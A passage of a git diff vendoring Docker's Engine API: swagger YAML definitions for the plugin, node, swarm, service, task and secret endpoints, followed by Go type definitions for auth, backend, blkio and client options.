"string" + - name: "tarContext" + in: "body" + description: "Path to tar containing plugin rootfs and manifest" + schema: + type: "string" + format: "binary" + tags: ["Plugin"] + /plugins/{name}/push: + post: + summary: "Push a plugin" + operationId: "PluginPush" + description: | + Push a plugin to the registry. + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + responses: + 200: + description: "no error" + 404: + description: "plugin not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Plugin"] + /plugins/{name}/set: + post: + summary: "Configure a plugin" + operationId: "PluginSet" + consumes: + - "application/json" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "body" + in: "body" + schema: + type: "array" + items: + type: "string" + example: ["DEBUG=1"] + responses: + 204: + description: "No error" + 404: + description: "Plugin not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Plugin"] + /nodes: + get: + summary: "List nodes" + operationId: "NodeList" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Node" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the nodes list, encoded as JSON (a `map[string][]string`). + + Available filters: + - `id=` + - `label=` + - `membership=`(`accepted`|`pending`)` + - `name=` + - `role=`(`manager`|`worker`)` + type: "string" + tags: ["Node"] + /nodes/{id}: + get: + summary: "Inspect a node" + operationId: "NodeInspect" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Node" + 404: + description: "no such node" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID or name of the node" + type: "string" + required: true + tags: ["Node"] + delete: + summary: "Delete a node" + operationId: "NodeDelete" + responses: + 200: + description: "no error" + 404: + description: "no such node" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID or name of the node" + type: "string" + required: true + - name: "force" + in: "query" + description: "Force remove a node from the swarm" + default: false + type: "boolean" + tags: ["Node"] + /nodes/{id}/update: + post: + summary: "Update a node" + operationId: "NodeUpdate" + responses: + 200: + description: "no error" + 404: + description: "no such node" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID of the node" + type: "string" + required: true + - name: "body" + in: "body" + schema: + $ref: "#/definitions/NodeSpec" + - name: "version" + in: "query" + description: "The version number of the node object being updated. This is required to avoid conflicting writes." + type: "integer" + format: "int64" + required: true + tags: ["Node"] + /swarm: + get: + summary: "Inspect swarm" + operationId: "SwarmInspect" + responses: + 200: + description: "no error" + schema: + allOf: + - $ref: "#/definitions/ClusterInfo" + - type: "object" + properties: + JoinTokens: + description: "The tokens workers and managers need to join the swarm." + type: "object" + properties: + Worker: + description: "The token workers can use to join the swarm." + type: "string" + Manager: + description: "The token managers can use to join the swarm." + type: "string" + example: + CreatedAt: "2016-08-15T16:00:20.349727406Z" + Spec: + Dispatcher: + HeartbeatPeriod: 5000000000 + Orchestration: + TaskHistoryRetentionLimit: 10 + CAConfig: + NodeCertExpiry: 7776000000000000 + Raft: + LogEntriesForSlowFollowers: 500 + HeartbeatTick: 1 + SnapshotInterval: 10000 + ElectionTick: 3 + TaskDefaults: {} + EncryptionConfig: + AutoLockManagers: false + Name: "default" + JoinTokens: + Worker: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a" + Manager: "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l" + ID: "70ilmkj2f6sp2137c753w2nmt" + UpdatedAt: "2016-08-15T16:32:09.623207604Z" + Version: + Index: 51 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Swarm"] + /swarm/init: + post: + summary: "Initialize a new swarm" + operationId: "SwarmInit" + produces: + - "application/json" + - "text/plain" + responses: + 200: + description: "no error" + schema: + description: "The node ID" + type: "string" + example: "7v2t30z9blmxuhnyo6s4cpenp" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 406: + description: "node is already part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + type: "object" + properties: + ListenAddr: + description: "Listen address used for inter-manager communication, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP). This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the default swarm listening port is used." + type: "string" + AdvertiseAddr: + description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible." + type: "string" + ForceNewCluster: + description: "Force creation of a new swarm." + type: "boolean" + Spec: + $ref: "#/definitions/SwarmSpec" + example: + ListenAddr: "0.0.0.0:2377" + AdvertiseAddr: "192.168.1.1:2377" + ForceNewCluster: false + Spec: + Orchestration: {} + Raft: {} + Dispatcher: {} + CAConfig: {} + EncryptionConfig: + AutoLockManagers: false + tags: ["Swarm"] + /swarm/join: + post: + summary: "Join an existing swarm" + operationId: "SwarmJoin" + responses: + 200: + description: "no error" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "node is already part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + type: "object" + properties: + ListenAddr: + description: "Listen address used for inter-manager communication if the node gets promoted to manager, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP)." + type: "string" + AdvertiseAddr: + description: "Externally reachable address advertised to other nodes. This can either be an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port number, like `eth0:4567`. If the port number is omitted, the port number from the listen address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when possible." + type: "string" + RemoteAddrs: + description: "Addresses of manager nodes already participating in the swarm." + type: "string" + JoinToken: + description: "Secret token for joining this swarm." + type: "string" + example: + ListenAddr: "0.0.0.0:2377" + AdvertiseAddr: "192.168.1.1:2377" + RemoteAddrs: + - "node1:2377" + JoinToken: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + tags: ["Swarm"] + /swarm/leave: + post: + summary: "Leave a swarm" + operationId: "SwarmLeave" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "force" + description: "Force leave swarm, even if this is the last manager or that it will break the cluster." + in: "query" + type: "boolean" + default: false + tags: ["Swarm"] + /swarm/update: + post: + summary: "Update a swarm" + operationId: "SwarmUpdate" + responses: + 200: + description: "no error" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + $ref: "#/definitions/SwarmSpec" + - name: "version" + in: "query" + description: "The version number of the swarm object being updated. This is required to avoid conflicting writes." + type: "integer" + format: "int64" + required: true + - name: "rotateWorkerToken" + in: "query" + description: "Rotate the worker join token." + type: "boolean" + default: false + - name: "rotateManagerToken" + in: "query" + description: "Rotate the manager join token." + type: "boolean" + default: false + - name: "rotateManagerUnlockKey" + in: "query" + description: "Rotate the manager unlock key." + type: "boolean" + default: false + tags: ["Swarm"] + /swarm/unlockkey: + get: + summary: "Get the unlock key" + operationId: "SwarmUnlockkey" + consumes: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + UnlockKey: + description: "The swarm's unlock key." + type: "string" + example: + UnlockKey: "SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Swarm"] + /swarm/unlock: + post: + summary: "Unlock a locked manager" + operationId: "SwarmUnlock" + consumes: + - "application/json" + produces: + - "application/json" + parameters: + - name: "body" + in: "body" + required: true + schema: + type: "object" + properties: + UnlockKey: + description: "The swarm's unlock key." + type: "string" + example: + UnlockKey: "SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Swarm"] + /services: + get: + summary: "List services" + operationId: "ServiceList" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Service" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + type: "string" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the services list. Available filters: + + - `id=` + - `name=` + - `label=` + tags: ["Service"] + /services/create: + post: + summary: "Create a service" + operationId: "ServiceCreate" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + type: "object" + properties: + ID: + description: "The ID of the created service." + type: "string" + Warning: + description: "Optional warning message" + type: "string" + example: + ID: "ak7w3gjqoa3kuz8xcpnyy0pvl" + Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found" + 403: + description: "network is not eligible for services" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "name conflicts with an existing service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + 503: + description: "server error or node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + required: true + schema: + allOf: + - $ref: "#/definitions/ServiceSpec" + - type: "object" + example: + Name: "web" + TaskTemplate: + ContainerSpec: + Image: "nginx:alpine" + Mounts: + - + ReadOnly: true + Source: "web-data" + Target: "/usr/share/nginx/html" + Type: "volume" + VolumeOptions: + DriverConfig: {} + Labels: + com.example.something: "something-value" + User: "33" + DNSConfig: + Nameservers: ["8.8.8.8"] + Search: ["example.org"] + Options: ["timeout:3"] + LogDriver: + Name: "json-file" + Options: + max-file: "3" + max-size: "10M" + Placement: {} + Resources: + Limits: + MemoryBytes: 104857600 + Reservations: {} + RestartPolicy: + Condition: "on-failure" + Delay: 10000000000 + MaxAttempts: 10 + Mode: + Replicated: + Replicas: 4 + UpdateConfig: + Delay: 30000000000 + Parallelism: 2 + FailureAction: "pause" + EndpointSpec: + Ports: + - + Protocol: "tcp" + PublishedPort: 8080 + TargetPort: 80 + Labels: + foo: "bar" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration for pulling from private registries. [See the authentication section for details.](#section/Authentication)" + type: "string" + tags: ["Service"] + /services/{id}: + get: + summary: "Inspect a service" + operationId: "ServiceInspect" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Service" + 404: + description: "no such service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID or name of service." + required: true + type: "string" + tags: ["Service"] + delete: + summary: "Delete a service" + operationId: "ServiceDelete" + responses: + 200: + description: "no error" + 404: + description: "no such service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID or name of service." + required: true + type: "string" + tags: ["Service"] + /services/{id}/update: + post: + summary: "Update a service" + operationId: "ServiceUpdate" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/ImageDeleteResponse" + 404: + description: "no such service" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID or name of service." + required: true + type: "string" + - name: "body" + in: "body" + required: true + schema: + allOf: + - $ref: "#/definitions/ServiceSpec" + - type: "object" + example: + Name: "top" + TaskTemplate: + ContainerSpec: + Image: "busybox" + Args: + - "top" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ForceUpdate: 0 + Mode: + Replicated: + Replicas: 1 + UpdateConfig: + Parallelism: 1 + Monitor: 15000000000 + MaxFailureRatio: 0.15 + EndpointSpec: + Mode: "vip" + + - name: "version" + in: "query" + description: "The version number of the service object being updated. This is required to avoid conflicting writes." + required: true + type: "integer" + - name: "registryAuthFrom" + in: "query" + type: "string" + description: "If the X-Registry-Auth header is not specified, this + parameter indicates where to find registry authorization credentials. The + valid values are `spec` and `previous-spec`." + default: "spec" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration for pulling from private registries. [See the authentication section for details.](#section/Authentication)" + type: "string" + + tags: ["Service"] + /services/{id}/logs: + get: + summary: "Get service logs" + description: | + Get `stdout` and `stderr` logs from a service. + + **Note**: This endpoint works only for services with the `json-file` or `journald` logging drivers. + operationId: "ServiceLogs" + produces: + - "application/vnd.docker.raw-stream" + - "application/json" + responses: + 101: + description: "logs returned as a stream" + schema: + type: "string" + format: "binary" + 200: + description: "logs returned as a string in response body" + schema: + type: "string" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "details" + in: "query" + description: "Show extra details provided to logs." + type: "boolean" + default: false + - name: "follow" + in: "query" + description: | + Return the logs as a stream. + + This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach). + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Return logs from `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Return logs from `stderr`" + type: "boolean" + default: false + - name: "since" + in: "query" + description: "Only return logs since this time, as a UNIX timestamp" + type: "integer" + default: 0 + - name: "timestamps" + in: "query" + description: "Add timestamps to every log line" + type: "boolean" + default: false + - name: "tail" + in: "query" + description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines." + type: "string" + default: "all" + tags: ["Service"] + /tasks: + get: + summary: "List tasks" + operationId: "TaskList" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Task" + example: + - ID: "0kzzo1i0y4jz6027t0k7aezc7" + Version: + Index: 71 + CreatedAt: "2016-06-07T21:07:31.171892745Z" + UpdatedAt: "2016-06-07T21:07:31.376370513Z" + Spec: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Slot: 1 + NodeID: "60gvrl6tm78dmak4yl7srz94v" + Status: + Timestamp: "2016-06-07T21:07:31.290032978Z" + State: "running" + Message: "started" + ContainerStatus: + ContainerID: "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035" + PID: 677 + DesiredState: "running" + NetworksAttachments: + - Network: + ID: "4qvuz4ko70xaltuqbt8956gd1" + Version: + Index: 18 + CreatedAt: "2016-06-07T20:31:11.912919752Z" + UpdatedAt: "2016-06-07T21:07:29.955277358Z" + Spec: + Name: "ingress" + Labels: + com.docker.swarm.internal: "true" + DriverConfiguration: {} + IPAMOptions: + Driver: {} + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + DriverState: + Name: "overlay" + Options: + com.docker.network.driver.overlay.vxlanid_list: "256" + IPAMOptions: + Driver: + Name: "default" + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + Addresses: + - "10.255.0.10/16" + - ID: "1yljwbmlr8er2waf8orvqpwms" + Version: + Index: 30 + CreatedAt: "2016-06-07T21:07:30.019104782Z" + UpdatedAt: "2016-06-07T21:07:30.231958098Z" + Name: "hopeful_cori" + Spec: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Slot: 1 + NodeID: "60gvrl6tm78dmak4yl7srz94v" + Status: + Timestamp: "2016-06-07T21:07:30.202183143Z" + State: "shutdown" + Message: "shutdown" + ContainerStatus: + ContainerID: "1cf8d63d18e79668b0004a4be4c6ee58cddfad2dae29506d8781581d0688a213" + DesiredState: "shutdown" + NetworksAttachments: + - Network: + ID: "4qvuz4ko70xaltuqbt8956gd1" + Version: + Index: 18 + CreatedAt: "2016-06-07T20:31:11.912919752Z" + UpdatedAt: "2016-06-07T21:07:29.955277358Z" + Spec: + Name: "ingress" + Labels: + com.docker.swarm.internal: "true" + DriverConfiguration: {} + IPAMOptions: + Driver: {} + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + DriverState: + Name: "overlay" + Options: + com.docker.network.driver.overlay.vxlanid_list: "256" + IPAMOptions: + Driver: + Name: "default" + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + Addresses: + - "10.255.0.5/16" + + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + type: "string" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the tasks list. Available filters: + + - `id=` + - `name=` + - `service=` + - `node=` + - `label=key` or `label="key=value"` + - `desired-state=(running | shutdown | accepted)` + tags: ["Task"] + /tasks/{id}: + get: + summary: "Inspect a task" + operationId: "TaskInspect" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Task" + 404: + description: "no such task" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "ID of the task" + required: true + type: "string" + tags: ["Task"] + /secrets: + get: + summary: "List secrets" + operationId: "SecretList" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + $ref: "#/definitions/Secret" + example: + - ID: "ktnbjxoalbkvbvedmg1urrz8h" + Version: + Index: 11 + CreatedAt: "2016-11-05T01:20:17.327670065Z" + UpdatedAt: "2016-11-05T01:20:17.327670065Z" + Spec: + Name: "app-dev.crt" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + type: "string" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the secrets list. Available filters: + + - `names=` + tags: ["Secret"] + /secrets/create: + post: + summary: "Create a secret" + operationId: "SecretCreate" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + type: "object" + properties: + ID: + description: "The ID of the created secret." + type: "string" + example: + ID: "ktnbjxoalbkvbvedmg1urrz8h" + 406: + description: "server error or node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "name conflicts with an existing object" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "body" + in: "body" + schema: + allOf: + - $ref: "#/definitions/SecretSpec" + - type: "object" + example: + Name: "app-key.crt" + Labels: + foo: "bar" + Data: "VEhJUyBJUyBOT1QgQSBSRUFMIENFUlRJRklDQVRFCg==" + tags: ["Secret"] + /secrets/{id}: + get: + summary: "Inspect a secret" + operationId: "SecretInspect" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Secret" + example: + ID: "ktnbjxoalbkvbvedmg1urrz8h" + Version: + Index: 11 + CreatedAt: "2016-11-05T01:20:17.327670065Z" + UpdatedAt: "2016-11-05T01:20:17.327670065Z" + Spec: + Name: "app-dev.crt" + 404: + description: "secret not found" + schema: + $ref: "#/definitions/ErrorResponse" + 406: + description: "node is not part of a swarm" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + type: "string" + description: "ID of the secret" + tags: ["Secret"] + delete: + summary: "Delete a secret" + operationId: "SecretDelete" + produces: + - "application/json" + responses: + 204: + description: "no error" + 404: + description: "secret not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + type: "string" + description: "ID of the secret" + tags: ["Secret"] + /secrets/{id}/update: + post: + summary: "Update a Secret" + operationId: "SecretUpdate" + responses: + 200: + description: "no error" + 404: + description: "no such secret" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "The ID of the secret" + type: "string" + required: true + - name: "body" + in: "body" + schema: + $ref: "#/definitions/SecretSpec" + description: "The spec of the secret to update. Currently, only the Labels field can be updated. All other fields must remain unchanged from the [SecretInspect endpoint](#operation/SecretInspect) response values." + - name: "version" + in: "query" + description: "The version number of the secret object being updated. This is required to avoid conflicting writes." + type: "integer" + format: "int64" + required: true + tags: ["Secret"] diff --git a/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl new file mode 100644 index 0000000000..3a3d7527da --- /dev/null +++ b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl @@ -0,0 +1,26 @@ +package {{ .Package }} + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +import ( + "net/http" + + context "golang.org/x/net/context" + + {{ range .DefaultImports }}{{ printf "%q" . }} + {{ end }} + {{ range $key, $value := .Imports }}{{ $key }} {{ printf "%q" $value }} + {{ end }} +) + + +{{ range .ExtraSchemas }} +// {{ .Name }} {{ template "docstring" . }} +// swagger:model {{ .Name }} +{{ template "schema" . }} +{{ end }} diff --git a/vendor/github.com/docker/docker/api/types/auth.go b/vendor/github.com/docker/docker/api/types/auth.go new file mode 100644 index 0000000000..056af6b842 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/auth.go @@ -0,0 +1,22 @@ +package types + +// AuthConfig contains authorization information for connecting to a Registry +type AuthConfig struct { + Username string `json:"username,omitempty"` + Password string `json:"password,omitempty"` + Auth string `json:"auth,omitempty"` + + // Email is an optional value associated with the username. + // This field is deprecated and will be removed in a later + // version of docker. + Email string `json:"email,omitempty"` + + ServerAddress string `json:"serveraddress,omitempty"` + + // IdentityToken is used to authenticate the user and get + // an access token for the registry. + IdentityToken string `json:"identitytoken,omitempty"` + + // RegistryToken is a bearer token to be sent to a registry + RegistryToken string `json:"registrytoken,omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/backend/backend.go b/vendor/github.com/docker/docker/api/types/backend/backend.go new file mode 100644 index 0000000000..abc0bba3fe --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/backend/backend.go @@ -0,0 +1,84 @@ +// Package backend includes types to send information to server backends. +package backend + +import ( + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/streamformatter" +) + +// ContainerAttachConfig holds the streams to use when connecting to a container to view logs. +type ContainerAttachConfig struct { + GetStreams func() (io.ReadCloser, io.Writer, io.Writer, error) + UseStdin bool + UseStdout bool + UseStderr bool + Logs bool + Stream bool + DetachKeys string + + // Used to signify that streams are multiplexed and therefore need a StdWriter to encode stdout/sderr messages accordingly. + // TODO @cpuguy83: This shouldn't be needed. It was only added so that http and websocket endpoints can use the same function, and the websocket function was not using a stdwriter prior to this change... + // HOWEVER, the websocket endpoint is using a single stream and SHOULD be encoded with stdout/stderr as is done for HTTP since it is still just a single stream. + // Since such a change is an API change unrelated to the current changeset we'll keep it as is here and change separately. + MuxStreams bool +} + +// ContainerLogsConfig holds configs for logging operations. Exists +// for users of the backend to to pass it a logging configuration. +type ContainerLogsConfig struct { + types.ContainerLogsOptions + OutStream io.Writer +} + +// ContainerStatsConfig holds information for configuring the runtime +// behavior of a backend.ContainerStats() call. +type ContainerStatsConfig struct { + Stream bool + OutStream io.Writer + Version string +} + +// ExecInspect holds information about a running process started +// with docker exec. +type ExecInspect struct { + ID string + Running bool + ExitCode *int + ProcessConfig *ExecProcessConfig + OpenStdin bool + OpenStderr bool + OpenStdout bool + CanRemove bool + ContainerID string + DetachKeys []byte + Pid int +} + +// ExecProcessConfig holds information about the exec process +// running on the host. +type ExecProcessConfig struct { + Tty bool `json:"tty"` + Entrypoint string `json:"entrypoint"` + Arguments []string `json:"arguments"` + Privileged *bool `json:"privileged,omitempty"` + User string `json:"user,omitempty"` +} + +// ContainerCommitConfig is a wrapper around +// types.ContainerCommitConfig that also +// transports configuration changes for a container. +type ContainerCommitConfig struct { + types.ContainerCommitConfig + Changes []string +} + +// ProgressWriter is an interface +// to transport progress streams. +type ProgressWriter struct { + Output io.Writer + StdoutFormatter *streamformatter.StdoutFormatter + StderrFormatter *streamformatter.StderrFormatter + ProgressReaderFunc func(io.ReadCloser) io.ReadCloser +} diff --git a/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go new file mode 100644 index 0000000000..931ae10ab1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go @@ -0,0 +1,23 @@ +package blkiodev + +import "fmt" + +// WeightDevice is a structure that holds device:weight pair +type WeightDevice struct { + Path string + Weight uint16 +} + +func (w *WeightDevice) String() string { + return fmt.Sprintf("%s:%d", w.Path, w.Weight) +} + +// ThrottleDevice is a structure that holds device:rate_per_second pair +type ThrottleDevice struct { + Path string + Rate uint64 +} + +func (t *ThrottleDevice) String() string { + return fmt.Sprintf("%s:%d", t.Path, t.Rate) +} diff --git a/vendor/github.com/docker/docker/api/types/client.go b/vendor/github.com/docker/docker/api/types/client.go new file mode 100644 index 0000000000..7900d64f0d --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/client.go @@ -0,0 +1,378 @@ +package types + +import ( + "bufio" + "io" + "net" + "os" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/go-units" +) + +// CheckpointCreateOptions holds parameters to create a checkpoint from a container +type CheckpointCreateOptions struct { + CheckpointID string + CheckpointDir string + Exit bool +} + +// CheckpointListOptions holds parameters to list checkpoints for a container +type CheckpointListOptions struct { + CheckpointDir string +} + +// CheckpointDeleteOptions holds parameters to delete a checkpoint from a container +type CheckpointDeleteOptions struct { + CheckpointID string + CheckpointDir string +} + +// ContainerAttachOptions holds parameters to attach to a container. +type ContainerAttachOptions struct { + Stream bool + Stdin bool + Stdout bool + Stderr bool + DetachKeys string + Logs bool +} + +// ContainerCommitOptions holds parameters to commit changes into a container. +type ContainerCommitOptions struct { + Reference string + Comment string + Author string + Changes []string + Pause bool + Config *container.Config +} + +// ContainerExecInspect holds information returned by exec inspect. +type ContainerExecInspect struct { + ExecID string + ContainerID string + Running bool + ExitCode int + Pid int +} + +// ContainerListOptions holds parameters to list containers with. +type ContainerListOptions struct { + Quiet bool + Size bool + All bool + Latest bool + Since string + Before string + Limit int + Filters filters.Args +} + +// ContainerLogsOptions holds parameters to filter logs with. +type ContainerLogsOptions struct { + ShowStdout bool + ShowStderr bool + Since string + Timestamps bool + Follow bool + Tail string + Details bool +} + +// ContainerRemoveOptions holds parameters to remove containers. +type ContainerRemoveOptions struct { + RemoveVolumes bool + RemoveLinks bool + Force bool +} + +// ContainerStartOptions holds parameters to start containers. +type ContainerStartOptions struct { + CheckpointID string + CheckpointDir string +} + +// CopyToContainerOptions holds information +// about files to copy into a container +type CopyToContainerOptions struct { + AllowOverwriteDirWithFile bool +} + +// EventsOptions holds parameters to filter events with. +type EventsOptions struct { + Since string + Until string + Filters filters.Args +} + +// NetworkListOptions holds parameters to filter the list of networks with. +type NetworkListOptions struct { + Filters filters.Args +} + +// HijackedResponse holds connection information for a hijacked request. +type HijackedResponse struct { + Conn net.Conn + Reader *bufio.Reader +} + +// Close closes the hijacked connection and reader. +func (h *HijackedResponse) Close() { + h.Conn.Close() +} + +// CloseWriter is an interface that implements structs +// that close input streams to prevent from writing. +type CloseWriter interface { + CloseWrite() error +} + +// CloseWrite closes a readWriter for writing. +func (h *HijackedResponse) CloseWrite() error { + if conn, ok := h.Conn.(CloseWriter); ok { + return conn.CloseWrite() + } + return nil +} + +// ImageBuildOptions holds the information +// necessary to build images. +type ImageBuildOptions struct { + Tags []string + SuppressOutput bool + RemoteContext string + NoCache bool + Remove bool + ForceRemove bool + PullParent bool + Isolation container.Isolation + CPUSetCPUs string + CPUSetMems string + CPUShares int64 + CPUQuota int64 + CPUPeriod int64 + Memory int64 + MemorySwap int64 + CgroupParent string + NetworkMode string + ShmSize int64 + Dockerfile string + Ulimits []*units.Ulimit + // See the parsing of buildArgs in api/server/router/build/build_routes.go + // for an explaination of why BuildArgs needs to use *string instead of + // just a string + BuildArgs 